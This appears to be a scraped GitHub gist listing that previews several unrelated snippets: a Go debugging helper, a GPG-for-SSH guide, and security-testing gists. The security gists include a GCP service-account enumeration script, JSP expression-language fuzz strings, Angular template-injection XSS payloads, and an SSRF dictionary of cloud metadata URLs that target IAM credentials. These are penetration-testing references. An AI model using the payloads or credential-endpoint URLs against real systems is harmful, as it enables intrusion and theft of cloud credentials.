Andrew Luke Sw4mpf0x
@carnal0wnage
carnal0wnage / gcp_enum.sh
Last active Dec 13, 2020
use the gcloud utilities to enumerate as much access as possible from a GCP service account json file. see blog post: <to insert>
View gcp_enum.sh
# gcloud auth activate-service-account --key-file=85.json
# gcloud projects list
project="my-project"
space=""
echo "gcloud auth list"
gcloud auth list
echo -e "$space"
View jsp-jstl-intruders.txt
${0 }
${0 == pageList.maxPage}
${1}
${1 eq currentPageNumber }
${5}
${5/6}
${a+1 }
${a.academyName}
${a.academyNumber}
${academyNumber==a.academyNumber}
@FrankSpierings
FrankSpierings / README.md
Last active Dec 26, 2020
Linux Container Escapes and Hardening
View README.md
@briangershon
briangershon / gist:fa9feb08e6a65d52bdc35c738d8cf104
Created Jan 8, 2017
Log Request Body for Debugging (golang)
View gist:fa9feb08e6a65d52bdc35c738d8cf104
buf, bodyErr := ioutil.ReadAll(r.Body)
if bodyErr != nil {
log.Print("bodyErr ", bodyErr.Error())
http.Error(w, bodyErr.Error(), http.StatusInternalServerError)
return
}
rdr1 := ioutil.NopCloser(bytes.NewBuffer(buf))
rdr2 := ioutil.NopCloser(bytes.NewBuffer(buf))
log.Printf("BODY: %q", rdr1)
@mccabe615
mccabe615 / AngularTI.md
Last active Jan 10, 2021
Angular Template Injection Payloads
View AngularTI.md

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@epixoip
epixoip / 8x1080.md
Last active Jan 8, 2021
8x Nvidia GTX 1080 Hashcat Benchmarks
View 8x1080.md
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active Jan 25, 2021
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@andrewlkho
andrewlkho / gist:7373190
Last active Sep 28, 2020
How to use authentication subkeys in gpg for SSH public key authentication
View gist:7373190

GPG subkeys marked with the "authenticate" capability can be used for public key authentication with SSH. This is done using gpg-agent which, using the --enable-ssh-support option, can implement the agent protocol used by SSH.

Requirements

A working gpg2 setup is required. It may be possible to use gpg 1.4 but with gpg-agent compiled from gpg2. If you are using OS X 10.9 (Mavericks) then you may find the instructions [here][1] useful.